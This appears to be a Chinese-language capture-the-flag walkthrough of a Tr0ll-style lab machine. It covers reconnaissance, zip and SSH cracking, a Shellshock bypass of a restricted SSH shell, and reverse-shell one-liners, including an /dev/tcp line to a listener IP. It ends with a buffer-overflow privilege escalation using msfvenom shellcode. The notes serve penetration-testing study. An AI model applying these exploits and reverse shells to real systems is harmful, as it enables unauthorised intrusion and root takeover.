##Nmap存活主機(jī)發(fā)現(xiàn)

----靶機(jī)IP：192.168.95.155

---全端口掃描

---指定端口掃描：沒有發(fā)現(xiàn)什么有用的信息

---思路1：通過ftp和Web收集用戶名和密碼，爆破SSH

---思路2：通過ftp和Web，獲取WebShell

---小米范系列工具的介紹與下載(存活主機(jī)掃描要求Java1.8，我的是java11)：

https://www.cnblogs.com/fsqsec/p/5501657.html

最新版本下載地址：http://www.cnblogs.com/SEC-fsq/p/5736675.html

#Web漏洞信息收集

---訪問80端口源代碼提示：<!--Nothing here, Try Harder!><!--Author: Tr0ll><!--Editor: VIM>

---這里收集到2個(gè)用戶名：Tr0ll ??VIM

----cupp密碼生成工具的使用

---根據(jù)姓、名、綽號(hào)、生日填寫爆破字典,會(huì)在目錄下生成一個(gè)根據(jù)姓名/出生日期的字典

---采用 Tr0ll/Tr0ll作為用戶名和密碼登陸ftp

---ls查看ftp里面存在一個(gè)zip文件，下載下來

----嘗試解壓，發(fā)現(xiàn)需要密碼，采用：Tr0ll和VIM均失敗

---采用dirb進(jìn)行目錄掃描，發(fā)現(xiàn)除了robots.txt其它都沒有訪問權(quán)限（可能會(huì)存在登陸界面）

---回到web進(jìn)行信息收集,訪問robots.txt,發(fā)現(xiàn)一些web的目錄

---采用dirb爆破robots.txt文件（一個(gè)一個(gè)手工訪問比較麻煩）

---這幾個(gè)頁面跑下來都是一張圖片,其它的訪問沒有權(quán)限

---前端源碼提示更接近了，采用工具分析圖片

#圖片信息收集

---binwalk分離圖片，查看是否存在隱藏內(nèi)容

---exiftool查看圖片的描述信息

---strings查看圖片的底層存儲(chǔ)ASCII信息，發(fā)現(xiàn)下面多了一句話，提示y0ur_self目錄

---訪問發(fā)現(xiàn)一個(gè)文件

---點(diǎn)擊answer.txt,發(fā)現(xiàn)存在base64編碼的東西

---將文件下載下來，然后base64解碼

---cat發(fā)現(xiàn)是一個(gè)密碼字典，這顆ftp我們已經(jīng)登陸了，web沒有發(fā)現(xiàn)登陸界面

---能夠爆破的的只剩下zip文件和SSH，但是SSH爆破一般沒有這么輕松

---所以我們先爆破zip文件，看看能不能獲取一點(diǎn)有用的信息

#Zip爆破

---方法1:zip2johon

---將zip文件的密碼轉(zhuǎn)化為RSA加密的（類似SSH的私鑰）

---采用john爆破RSA的密碼本，--wordlist指定爆破字典

---但是這里沒有破解成功，破解zip不好用

---方法2：fcrackzip

---[-u|--use-unzip] 使用 unzip 清除錯(cuò)誤密碼
---[-D|--dictionary] 使用字典
---[-p|--init-password string] 使用字符串作為初始密碼/文件

---這里發(fā)現(xiàn)密碼為：ItCantReallyBeThisEasyRightLOL

---解壓lmao.zip發(fā)現(xiàn)靶機(jī)SSH的登陸密鑰的noob文件（用戶名為noob）

##SSH密鑰登陸

---SSH登陸的三種方式

---嘗試使用私鑰登陸：ssh? noob@192.168.95.155 -i noob?

---報(bào)錯(cuò)原因：沒有配置服務(wù)器接受以?ssh-rsa?格式簽名的公鑰進(jìn)行身份驗(yàn)證

---這里的原因是還不支持：發(fā)現(xiàn)是SHA-1算法不安全，新版本的openssh已經(jīng)禁用了

--這里是允許SHA-1算法（RAS）進(jìn)行SSH簽名登陸

---再次嘗試發(fā)現(xiàn)這里只是被拒絕，沒有報(bào)錯(cuò)了

---但是這里還是被拒絕了（這里是環(huán)境變量問題，不允許使用/bin/bash和/bin/sh）

---但是這里RSA是正確的，我們嘗試?yán)@過，進(jìn)而使用SSH的命令執(zhí)行

#bash CVE-2014-6271 中的遠(yuǎn)程利用漏洞：Shellshock

---簡(jiǎn)而言之，這里是一個(gè)受到限制的shell環(huán)境，目的是為了提高安全性，指的是一個(gè)會(huì)阻止/限制某些命令（如cd、ls、echo等）或“阻止”SHELL、PATH、USER等環(huán)境變量的shell環(huán)境

https://www.cnblogs.com/linuxsec/articles/10741580.html

---靶機(jī)本身因該處于/bin/sh或者/bin/bash，但是在這里由于做出了限制，導(dǎo)致在/bin/bash這個(gè)shell的環(huán)境下，無法使用SSH密鑰登陸

---繞過：bash CVE-2014-6271，如果SSH的密鑰是正確的，我們可以使用SSH的命令執(zhí)行

---這里可以看見bash子進(jìn)程，沒有繼承zsh的變量gu

---如果將臨時(shí)變量導(dǎo)出為環(huán)境變量

---當(dāng)前shell就像main()函數(shù)里面調(diào)用的一個(gè)函數(shù)（棧空間），shell進(jìn)程結(jié)束就銷毀

---export相當(dāng)于全局變量，shell進(jìn)程結(jié)束并不會(huì)被銷毀

---這里也可以以函數(shù)的形式設(shè)置函數(shù)變量：函數(shù)名() { ? ?# 函數(shù)內(nèi)部的操作和命令}

---在環(huán)境變量里面，變成了BASH_FUNC_gu%%


---也可以使用：export -nf gu刪除環(huán)境變量函數(shù)（-n刪除變量-f為函數(shù)）

---bash子進(jìn)程誤把普通環(huán)境變量(){ :; }當(dāng)做函數(shù)環(huán)境變量處理了

---注意: :什么都不做,在這里和true等價(jià)

---這個(gè)通過(){ :; }構(gòu)建普通環(huán)境變量，當(dāng)成命令執(zhí)行（我Kail的版本因該不存在這個(gè)漏洞）

---我的bash的版本不存在這個(gè)漏洞（bash<=4.3）

#總結(jié)：

---shelshocke簡(jiǎn)介：
---shellshock即unix 系統(tǒng)下的bash shell的一個(gè)漏洞，Bash 4.3以及之前的版本在處理某些構(gòu)造的環(huán)境變量時(shí)存在安全漏洞，向環(huán)境變量值內(nèi)的函數(shù)定義后添加多余的字符串會(huì)觸發(fā)此漏洞，攻擊者可利用此漏洞改變或繞過環(huán)境限制，以執(zhí)行任意的shell命令,甚至完全控制目標(biāo)系統(tǒng)。
---漏洞成因：
---bash使用的環(huán)境變量是通過函數(shù)名稱來調(diào)用的，導(dǎo)致漏洞出問題是以“(){”開頭定義的環(huán)境變量在命令ENV中解析成函數(shù)后，Bash執(zhí)行并未退出，而是繼續(xù)解析并執(zhí)行shell命令。核心的原因在于在輸入的過濾中沒有嚴(yán)格限制邊界，沒有做合法化的參數(shù)判斷。執(zhí)行CGI 時(shí)會(huì)調(diào)用Bash將Referer、host、UserAgent、header等作為環(huán)境變量進(jìn)行處理

---在Kail上傳切換到bash,通過(){ :; }構(gòu)建exp

---先根據(jù)步驟，構(gòu)建exp獲取用戶密碼

---漏洞原理還是沒有太清楚，先登陸后再分析，發(fā)現(xiàn)存在漏洞

---我以為是ssh后的命令執(zhí)行：'() { :;}; cat /etc/passwd'

---所以我構(gòu)造了：ssh -i noob noob@192.168.95.155 ccc='() { :;}; /bin/bash'

---構(gòu)建一個(gè)變量，但是這里沒有成功（說明是利用已有的環(huán)境變量）

---這里SSH連接應(yīng)該是執(zhí)行的環(huán)境變量：SSH_CLIENT或者SSH_CONNECTION(大概率是這個(gè))

#反彈shell到Kall主機(jī)

---方法1：bash進(jìn)行反彈

• bash -i：打開一個(gè)交互式的bash

• /dev/tcp/：是Linux中的一個(gè)特殊設(shè)備，打開這個(gè)文件相當(dāng)于發(fā)出一個(gè)socket調(diào)用

• >&: 后面接文件時(shí)，表示將標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯(cuò)誤輸出重定向至文件

• 0>&1: 代表將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出，這里的標(biāo)準(zhǔn)輸出已經(jīng)重定向到了“/dev/tcp/本機(jī)機(jī)器ip/本機(jī)機(jī)器監(jiān)聽的port”這個(gè)文件，也就是遠(yuǎn)程，那么標(biāo)準(zhǔn)輸入也就重定向到了遠(yuǎn)程
  

---方法2：使用bash的exec命令

• exec 5<> /dev/tcp/192.168.11.75/4444: 這行命令使用Bash的 exec命令打開一個(gè)文件描述符（File Descriptor）為5的連接，將其綁定到本地主機(jī)上指定的IP地址和端口號(hào)

• 文件描述符為0：表示標(biāo)準(zhǔn)輸入（stdin）。在Shell中，通常是從鍵盤接收輸入。

• 文件描述符為1：表示標(biāo)準(zhǔn)輸出（stdout）。在Shell中，通常是將輸出打印到終端。

• 文件描述符為2：表示標(biāo)準(zhǔn)錯(cuò)誤（stderr）。在Shell中，通常是將錯(cuò)誤消息打印到終端。

• 文件描述符大于2：通常由應(yīng)用程序打開的文件、套接字或其他I/O流所使用的文件描述符。文件描述符5就是這樣的一個(gè)用戶自定義的文件描述符

• <>表示互相重定向，因此可以寫入，也可以讀取文件、套接字或其他I/O流

• cat <&5: 從文件描述符5（即TCP連接）讀取數(shù)據(jù)，并通過管道傳遞給while循環(huán)

• while read line;循環(huán)逐行讀取從cat命令傳遞來的數(shù)據(jù)，并將每一行的內(nèi)容賦值給變量line，

• read 是Bash shell中的一個(gè)內(nèi)置命令，它允許用戶在命令行中輸入內(nèi)容，并將輸入的內(nèi)容保存到一個(gè)變量中。在這里，line 是一個(gè)變量名，用于保存輸入的內(nèi)容

• 2>&5: 將標(biāo)準(zhǔn)錯(cuò)誤（stderr）重定向到文件描述符5，這樣任何錯(cuò)誤消息也會(huì)通過TCP連接返回給遠(yuǎn)程主機(jī)。

• >&5: 將標(biāo)準(zhǔn)輸出（stdout）重定向到文件描述符5，這樣命令執(zhí)行的結(jié)果也會(huì)通過TCP連接返回給遠(yuǎn)程主機(jī)

---方法3：使用Netcat-traditional反彈

---e表示： nc命令的輸入或輸出重定向到一個(gè)指定的程序

---方法4：使用python反彈

---由于之前將輸入和輸出重定向到套接字，因此現(xiàn)在bash與遠(yuǎn)程主機(jī)的Shell進(jìn)行交互，并將結(jié)果返回給遠(yuǎn)程主機(jī)，實(shí)現(xiàn)了反向Shell連接

---由于在shell命令行執(zhí)行,故添加python -c''

---方法5：perl反彈

---和Python思路類似

#ShellShock攻擊回顧

---通過構(gòu)建類型函數(shù)環(huán)境變量的方式構(gòu)建環(huán)境變量（如果是函數(shù)環(huán)境變量：

ailx10() { echo "ailx10 is a hacker";}），切換bash之后混淆

---在bash之前，ailx10只會(huì)當(dāng)初環(huán)境變量，執(zhí)行ailx10會(huì)報(bào)錯(cuò)

---在bash之后，ailx10被當(dāng)成了函數(shù)環(huán)境變量，執(zhí)行ailx10之間執(zhí)行命令echo

---通過env的查看，發(fā)現(xiàn)在bash之后，ailx10被寫成了函數(shù)環(huán)境變量的形式

---bash子進(jìn)程誤把普通環(huán)境變量(){ :; }當(dāng)做函數(shù)環(huán)境變量處理

---注意：在env里面，函數(shù)環(huán)境變量的特點(diǎn)：(){

---根據(jù)(){的特點(diǎn)，拼接命令執(zhí)行：abc='() { :; };/bin/ls'

---這里在env里面就像：abc=() { :;/bin/ls

---注意：:什么都不做,在這里和true等價(jià)

---但是真正的env只是abc=() { :，表示這個(gè)命令什么都不執(zhí)行

---這里再次執(zhí)行abc命令的時(shí)候，就是空

---但是好奇為什么切換bash的時(shí)候，會(huì)執(zhí)行構(gòu)造的命令執(zhí)行呢？

---這是由于：當(dāng)你切換到Bash時(shí)，如果在 ~/.bashrc或其他相關(guān)的初始化文件中包含這樣的函數(shù)定義，Bash會(huì)執(zhí)行這些文件并加載其中的函數(shù)和環(huán)境變量。所以，當(dāng)你切換到Bash時(shí)，會(huì)執(zhí)行abc函數(shù)的定義（包含了/bin/ls）,但是再次執(zhí)行就只是空

---一句話檢驗(yàn)shellshock

---shellshock的歸納如下

• 1. 產(chǎn)生新的bash

• 2. 通過環(huán)境變量傳遞

• 3. 環(huán)境變量以() {}這樣的形式

#SSH 來利用 shellshock

---為什么SSH要利用shellshock？

• ?如果帳戶被限制運(yùn)行特定命令，例如，僅 SFTP 帳戶或僅 git 帳戶等

• 有多種方法可以限制帳戶使用 SSH 運(yùn)行特定命令： ForceCommand選項(xiàng)中 sshd_config，或與 command=。 ?限制在 authorized_keys文件。 ?如果用戶的 shell 是 bash，則 Shellshock 漏洞允許通常只能訪問受限帳戶的用戶繞過限制并執(zhí)行任意命令

• 利用bash漏洞繞過“強(qiáng)制命令”，執(zhí)行任意命令。 發(fā)生這種情況是因?yàn)?strong>“ssh”守護(hù)進(jìn)程將我們傳遞的命令設(shè)置為 $SSH_ORIGINAL_COMMAND 環(huán)境并執(zhí)行它

---驗(yàn)證了我們之前SSH_CONNECTION的環(huán)境變量的猜想（emmm 這里還是有點(diǎn)迷惑）

##系統(tǒng)漏洞信息收集

---查看OS的系統(tǒng)內(nèi)核和發(fā)行版本（真老，漏洞百出）

---后續(xù)思路：1.谷歌搜索 2.searchsploit搜索 3.msf搜索

---4.linpeas.sh查看 5.Linux-exploit-suggester.sh查找漏洞

---查看用戶的計(jì)劃任務(wù)（crontab -l）和系統(tǒng)的計(jì)劃任務(wù)（find查找，發(fā)行沒有讀權(quán)限）

---find命令查找具有suid的權(quán)限

----查看非系統(tǒng)默認(rèn)目錄，發(fā)行熟悉的感覺（緩沖區(qū)溢出提權(quán)）

---在進(jìn)入目錄，顯示目錄下的文件大小及權(quán)限

• -a: 顯示所有文件和目錄，包括以.開頭的隱藏文件。

• -l: 使用長(zhǎng)格式輸出，顯示文件和目錄的詳細(xì)信息，如權(quán)限、所有者、組、大小、創(chuàng)建日期等。

• -h: 以人類可讀的方式顯示文件和目錄大小，例如顯示為 KB、MB、GB等單位。

• -R: 遞歸地列出當(dāng)前目錄及其子目錄中的文件和目錄。

---執(zhí)行了/door1/r00t文件（7.2K），直接退出shell了

---不知道為什么我的ls命令被禁止了，這里因該是我執(zhí)行/door1/r00t（7.3K）導(dǎo)致系統(tǒng)重啟

----下載linpeas.sh腳本分析

----操作系統(tǒng)存在系統(tǒng)漏洞

---靶機(jī)安裝了gdb、python、gcc、perl

---這里發(fā)現(xiàn)maleus的用戶存在sudo權(quán)限（可以嘗試爆破一下）

---使用hydra和之前網(wǎng)站獲取的腳本，爆破一些maleus的SSH

---指定爆破腳本，發(fā)現(xiàn)ssh限制靶機(jī)

----這里我恢復(fù)了一下快照，ls命令又可以使用

---進(jìn)入8.3K的r00t,先執(zhí)行，這里提示需要輸入（存在輸入點(diǎn)就可能存在緩沖區(qū)溢出漏洞）

---查看Python版本發(fā)現(xiàn)是python2，采用$()構(gòu)建運(yùn)行文件的參數(shù)

---python -c 'print "A" * 300'（運(yùn)行shell生成300個(gè)A，顯示分段錯(cuò)誤，說明存在緩沖區(qū)溢出）

---采用base64復(fù)制到Kail上進(jìn)行分析

#緩沖區(qū)溢出分析

---生成通過模式字符串，參數(shù) -l生成300個(gè)模式字符串

---查看靶機(jī)是否開啟ALSR

---這里發(fā)現(xiàn)沒有開啟，0沒有開啟，1半隨機(jī)，2全隨機(jī)（包括heap堆）

---Linux里面的內(nèi)存結(jié)構(gòu)

---緩沖區(qū)溢出漏洞的原理

---采用GDB獲取到發(fā)送緩沖區(qū)溢出時(shí)，模式字符串的值

---采用pattern_offsec確定緩沖區(qū)溢出的偏移量（緩沖區(qū)棧頂?shù)絜bp的偏移量）

---這里發(fā)現(xiàn)偏移量是268

---在kail采用pead模塊的gdb，checksec查看是否開啟防護(hù)機(jī)制,發(fā)現(xiàn)沒有防護(hù)

---構(gòu)建python2腳本，264個(gè)緩沖區(qū)+4個(gè)EBP+4個(gè)call_adr

---傳參執(zhí)行，然后查看寄存器，發(fā)現(xiàn)EBP和ESI里面的值確實(shí)是AAAA和BBBB的ASCII

---ESP的值：0xbffffb90

---如果傳遞超過call_adr限制的參數(shù)，就會(huì)進(jìn)入上一個(gè)函數(shù)

----堆棧是從低地址到高地址，這里ESP的值0xbffffb80，可以發(fā)現(xiàn)比0xbffffb90要小

---從這里可以看出，填充超過call_adr的字符串，就自動(dòng)進(jìn)入下一個(gè)函數(shù)的棧頂

---嚴(yán)格來說還不是上一個(gè)函數(shù)，是call之前的狀態(tài)

#緩沖區(qū)漏洞利用思路

---1.找到ESP 2.填充nop 3.確認(rèn)壞字符 4.生成剔除壞字符的shellcode 5.call_adr跳轉(zhuǎn)ESP

---生成壞字符

• {}：這是格式化字符串的占位符。在這里，我們只有一個(gè)占位符，表示要插入一個(gè)值。

• :02x：這是格式規(guī)范。其中， 02 表示輸出的字符串寬度為2，不足兩位的會(huì)用0填充； x 表示將數(shù)字轉(zhuǎn)換為小寫十六進(jìn)制字符

---運(yùn)行腳本，生成[1,255]的16進(jìn)制

---構(gòu)建驗(yàn)證壞字符的傳參（我這里kail要指明是Python2）

---這里發(fā)現(xiàn)：0x0A是壞字符（\n），同時(shí)也可以驗(yàn)證:ESP = call_adr + 4 = ebp+8

---x為查看內(nèi)存，x/<n/f/u> <addr>：n、f、u是可選的參數(shù)

---n是一個(gè)正整數(shù)，表示顯示內(nèi)存的長(zhǎng)度，也就是說從當(dāng)前地址向后顯示幾個(gè)地址的內(nèi)容。
---f 表示顯示的格式，參見上面。如果地址所指的是字符串，那么格式可以是s，如果 地址是指令地址，那么格式可以是i。
---u 表示從當(dāng)前地址往后請(qǐng)求的字節(jié)數(shù)，如果不指定的話，GDB默認(rèn)是4個(gè)bytes。u參數(shù)可以用下面的字符來代替，b表示單字節(jié)，h表示雙字節(jié)，w表示四字 節(jié)，g表示八字節(jié)

---剔除\x0a后再次嘗試，發(fā)現(xiàn)\x0b也是壞字符

---如此迭代，獲取壞字符：\x00 \x0a \x0b \x09? \x20

• \x00：這是空字符 (null character)，它是 ASCII 字符集中值為0的字符。在C語言風(fēng)格的字符串中，空字符通常用作字符串終止符或表示字符串的結(jié)尾。

• \x0A：這是換行字符 (newline)，也稱為換行符。在不同操作系統(tǒng)中，換行字符的表示可能不同，例如在Unix/Linux系統(tǒng)中通常是 \n，而在Windows系統(tǒng)中是 \r\n。在文本文件

• \x0B：這是垂直制表符 (vertical tab)，它在早期計(jì)算機(jī)和打印機(jī)中用于垂直定位，但現(xiàn)在很少使用。

• \x09：這是水平制表符 (tab)，也稱為制表符。它在文本處理中用于實(shí)現(xiàn)文本對(duì)齊或在輸出中創(chuàng)建固定大小的間距。

• \x20：這是空格字符 (space)，它是ASCII字符集中值為32的字符。在文本中，空格通常用于表示空白間隔

---MSF的msfvenom生成shellcode

----：-a 框架選擇；-p指定載荷 -b壞字符? -e 編碼 -f生成shellcode的格式 EXITFUNC=thread以線程的方式結(jié)束

---一個(gè)小技巧，可以tab來查看哪些shellcode

#構(gòu)建Linux反彈shell和本地exec執(zhí)行

---注意，也可以使用網(wǎng)站生成shellcode:

---本地exec命令執(zhí)行的shellcode

---構(gòu)建poc,call_adr的位置是要倒著寫（小段存儲(chǔ)，和?？臻g由高地址到低地址）

---\x90代表nop

---運(yùn)行發(fā)現(xiàn)獲取root(但是這里不是root用戶)

---而且切換bash之后，發(fā)現(xiàn)SUID權(quán)限沒有了

---查看ran_dir.py文件

---生成反彈的TCPshell

--生成了c文件類型的shellcode

---構(gòu)建payload

---監(jiān)聽6666端口

---這里我好奇計(jì)劃任務(wù)在哪里

---grep -r "ran_dir.py" / 2>/dev/null（遞歸搜索包含指定內(nèi)容的文件）

---直接cat是每十五分鐘執(zhí)行一次：cat /var/spool/cron/crontabs/root

---我之前的思路是使用find命令查看包含cron的文件

---但是計(jì)劃任務(wù)的目錄也可能是目錄

##知識(shí)點(diǎn)總結(jié)

---1.nmap掃描：存活主機(jī)、端口掃描、版本掃描、操作系統(tǒng)掃描

---2.Web頁面（前端源碼）收集用戶名/密碼爆破字典

---3.cupp配合用戶姓名、生日、家庭等生成用戶名的爆破密碼字典

---4.dirb目錄爆破和dirb訪問robots.txth文件，獲取敏感圖片，圖片解析：binwalk、exiftool、strings配合grep獲取Web后臺(tái)目錄

---5.Web頁面收集的用戶名/密碼弱口令登陸ftp獲取加密ZIp文件

---6.敏感Web后臺(tái)目錄獲取加密密碼字典，base64解碼

---7.加密ZIP文件爆破：1.fcrackzip -u -D -p?? 2.zip2john將zip轉(zhuǎn)化為rsa,john爆破rsa

---8.ssh登陸的三種方式：用戶名登陸、密鑰登陸、配置文件簡(jiǎn)化用戶名登陸

---9.RSA登陸SSH命令執(zhí)行（-t）

---10.shellshock原理：環(huán)境變量、函數(shù)環(huán)境變量、bash<=4.3、切換bash、（）{：；}

---11.ssh命令執(zhí)行結(jié)合shellshock:

---12.shell反彈一句話的四種方式

---13.提權(quán)思路：系統(tǒng)漏洞（內(nèi)核/版本）、Sudo提權(quán)（sudo -l | /etc/sudoers）、SUID提權(quán)(find / -perm -u=s)、計(jì)劃任務(wù)提權(quán)(crontab | /var/)、密碼提權(quán)（/etc/shadow|/etc/passwd)、服務(wù)提權(quán)(端口碰撞)、緩沖區(qū)溢出提權(quán)

---14.緩沖區(qū)溢出提權(quán)流程：檢驗(yàn)是否存在ALSR、checksec、是否存在輸入和敏感函數(shù)、模塊字符串確定偏移量、壞字符確定、shellcode變量、利用payload繞過